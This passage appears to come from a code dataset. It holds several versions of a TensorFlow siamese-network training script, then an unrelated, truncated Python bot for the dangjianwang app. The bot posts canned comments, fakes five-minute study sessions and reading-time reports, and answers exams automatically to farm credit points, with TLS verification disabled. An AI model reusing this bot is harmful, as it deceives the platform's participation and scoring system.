neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n",
"step-3": "<mask token>\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n",
"step-4": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n",
"step-5": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\n\nbatch_size=64\ninput_height=32\ninput_width=32\ntotal_epoch_num=50\nsnapshot=100\nsupport_image_extensions=[\".jpg\",\".png\",\".jpeg\",\".bmp\"]\nmargin=1.0\nchannals=3\n\ntrain_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/train\"\ntest_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/test\"\n\nmodel_path=\"models/\"\npb_path=os.path.join(model_path,\"pb/\")\nckpt_path=os.path.join(model_path,\"ckpt/\")\n\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name=\"siamese_triplet_28out_allloss_bn\"\n\nif __name__ == '__main__':\n # image_paths,labels=get_images_path(test_image_root)\n # data=next_batch(True,None,image_paths,labels)\n # for left,right,label in zip(*data):\n # cv2.imshow(\"left\",left)\n # cv2.imshow(\"right\", right)\n # print(label)\n # cv2.waitKey(0)\n\n first_shape=None\n anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name=\"anchor\")\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"similar\")\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"dissimilar\")\n labels_placeholder = tf.placeholder(tf.float32, shape=\n [None if first_shape is None else first_shape * 3, ], name=\"labels\")\n is_training_placeholder = tf.placeholder_with_default(False, shape=(), name=\"is_training\")\n siamese_net=siameseNet.siameseNet()\n\n anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder)\n loss,pos_dist,neg_dist = siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin)\n\n flatten_out_anchor = tf.identity(anchor, name=\"flatten_anchor\")\n flatten_out_similar = tf.identity(similar, name=\"flatten_similar\")\n flatten_out_dissimilar = tf.identity(dissimilar, name=\"flatten_dissimilar\")\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n # learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9)\n # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)\n\n with tf.control_dependencies([tf.group(*update_ops)]):\n # train_step = optimizer.minimize(loss, global_step)\n train_step = tf.train.MomentumOptimizer(0.01, 0.90).\\\n minimize(loss, global_step=global_step)\n\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions,\n input_height,input_width,channals)\n\n test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions,\n input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # if os.path.exists(os.path.join(ckpt_path, \"checkpoint\")):\n # ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))\n\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n\n train_anchor, train_similar, train_dissimilar,train_labels = \\\n train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar,test_labels = \\\n test_dataset.next_triplet_batch()\n\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:train_labels,\n is_training_placeholder:True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:test_labels,\n is_training_placeholder: False}\n _,_global_step=sess.run([train_step,global_step], feed_dict=train_dict)\n\n anchor_out,similar_out,dissimilar_out = sess.run([\n flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar],\n feed_dict=train_dict)\n\n _train_loss,_train_pos_dist,_train_neg_dist = \\\n sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict)\n _test_loss,_test_pos_dist,_test_neg_dist =\\\n sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict)\n\n print(\"distance:\",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = \"No mean or variance\"\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name)\n one_moving_meaning_show = \"{}={}\".\\\n format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval()))\n\n print(one_moving_meaning_show)\n show_text = \"epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}\".format \\\n (epoch_num, iters_num + 1, _global_step, _train_loss, \"0.99\", _test_loss)\n print(show_text)\n\n if _global_step % snapshot == 0:\n # 保存PB\n constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, [\"flatten_anchor\"])\n save_model_name=model_name + \"-\" + str(_global_step) + \".pb\"\n with tf.gfile.FastGFile(pb_path + save_model_name, mode=\"wb\") as fw:\n fw.write(constant_graph.SerializeToString())\n # 保存CKPT\n ckpt_saver.save(sess, ckpt_path + model_name + \".ckpt\", global_step=total_iters_num)\n print(\"Successfully saved model {}\".format(save_model_name))\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Runner:
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()
self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
self.thumbedFileList = []
self.debug = True
self.session = requests.session()
self.appid = appid
self.headers = {'User-Agent':
'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
, 'header_version': '80', 'system': 'android', 'Connection':
'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Help/List'])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=[
'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
<|reserved_special_token_0|>
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
<|reserved_special_token_0|>
def getThumbFromFile(self):
"""
:return: 文件中id组成的列表
"""
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
"""
返回点赞等自动执行的次数的字典
:return:
"""
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
"""
获得一个连接的token
每个连接都需要使用到
:return:
"""
data = {'appid': self.appid, 'username': self.username, 'password':
self.password}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data = {'token': self.token, 'appid': self.appid}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
"""
获得一大串用户的信息,暂时没用
:return:
"""
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
"""
获得人员当前的得分等级参数
:return:
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {'fullScore': fullScore, 'gainScore': gainScore,
'currentLevel': currentLevel, 'username': username}
return ret
<|reserved_special_token_0|>
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {'token': self.token, 'appid': self.appid, 'type_id':
'791', 'page_index': '1'}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['name'], i['id']))
return pages
def doThumb(self, id):
"""
点赞函数,操作与id对应的页面
每次记录对应的信息到文件
:return:
"""
contents = ['关注', '关注!', '关注!!']
data = {'id': id, 'comment': random.choice(contents), 'token': self
.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
if rjson['code'] == '1003':
self.token = self.getToken()
elif rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.thumbedPages.append(id)
for i in list(set(self.thumbPageList)):
if id == i[1]:
temp = {'title': i[0]}
self.thumbResults.update(temp)
log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
'comment'])
detail = '{} 主题:{}\n回复:{}\n'.format(self.
getCurrentTime(), i[0], data['comment'])
write2File(self, './results/', 'result.txt', log)
thumbInfo = {'title': i[0], 'reply': data['comment']}
self.thumbPages.remove(id)
self.writeThumb2File(id=id)
return detail, thumbInfo
elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
print('因评论过快,等待一段时间')
time.sleep(20)
else:
print('rjson', rjson)
self.thumbedPages.remove(id)
self.writeThumb2File(id=id)
log = '点赞:{}'.format(rjson)
self.writeLog2File(log)
print(log)
time.sleep(10)
def doHelp(self, id, callback=None):
"""
互助功能
:param id:
:return:
"""
detail = ''
helpInfo = None
log = ''
content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
data = {'id': id, 'content': random.choice(content), 'token': self.
token, 'appid': self.appid}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
'comment'])
write2File(self, './results/', 'result.txt', log)
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return detail, log, helpInfo
def doView(self):
"""
党员视角发布功能
:return:
"""
content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
data = {'content': random.choice(content), 'token': self.token,
'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
'data']['content'])
publicContent = rjson['data']['content']
return detail, publicContent
def doStudy(self, mid):
"""
前三个post函数的响应的三个请求
get用来获得填写的内容
最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。
:param mid:
:return:
"""
interval = 60 * 5 + 5
def post1():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post1:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post2():
data = {'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post2:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post3():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post3:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def get1():
url = (
'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
.format(self.token, mid))
rjson = self.session.get(url=url)
text = rjson.content
soup = BeautifulSoup(text, 'html.parser')
retContents = []
for div in soup.find_all('p'):
p = div.text.strip()
retContents.append(p if 100 > len(p) < 200 else p[0:200])
return random.choice(retContents)
def recordFeeling(content=None):
if not content:
content = (
'伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
)
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'content': content}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习recordFeeling:{}'.format(rjson)
self.writeLog2File(log)
print('in recordFeeling')
print(log)
if rjson['code'] == '200':
return {'content': content}
elif rjson['code'] == '1120':
addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
'人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
'民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
return recordFeeling(content='{}\n{}'.format(content,
random.choice(addtion)))
else:
return None
def readTime():
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'time': interval}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习readTime:{}'.format(rjson)
self.writeLog2File(log)
print(log)
post1()
time.sleep(1)
post2()
time.sleep(1)
post3()
time.sleep(1)
content = get1()
time.sleep(1)
count = 0
print('开始学习请稍后')
for i in range(interval):
count += 1
if count % 30 == 0:
print('已用时{}秒'.format(count))
time.sleep(1)
print('填写的学习体会', content)
self.studyRsults.update(recordFeeling(content=content))
time.sleep(1)
readTime()
time.sleep(1)
pass
def doExam(self):
"""
:param self:
:return:
"""
ids = []
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
rjson = self.session.post(url=examlistUrl, data=data, verify=False
).json()
time.sleep(0.3)
print('*' * 99)
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
rjson = self.session.post(url=banklistUrl, data=data, verify=False
).json()
for i in rjson['data']:
tem = i['bank_name'], i['id']
self.examlist.append(tem)
if i['bank_name'] == '十九大报告100题(单选)':
temp = {'title': i['bank_name'], 'detail': i['detail'],
'id': i['id']}
self.examC19Info.append(temp)
time.sleep(0.3)
print('*' * 99)
data = {'bank': '6', 'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
aa = rjson['data']
paper = aa['id']
for i in aa['questions']:
temp = {'id': i['id'], 'content': i['content']}
ids.append(temp)
print('*' * 99)
time.sleep(0.5)
answers = []
for i in ids:
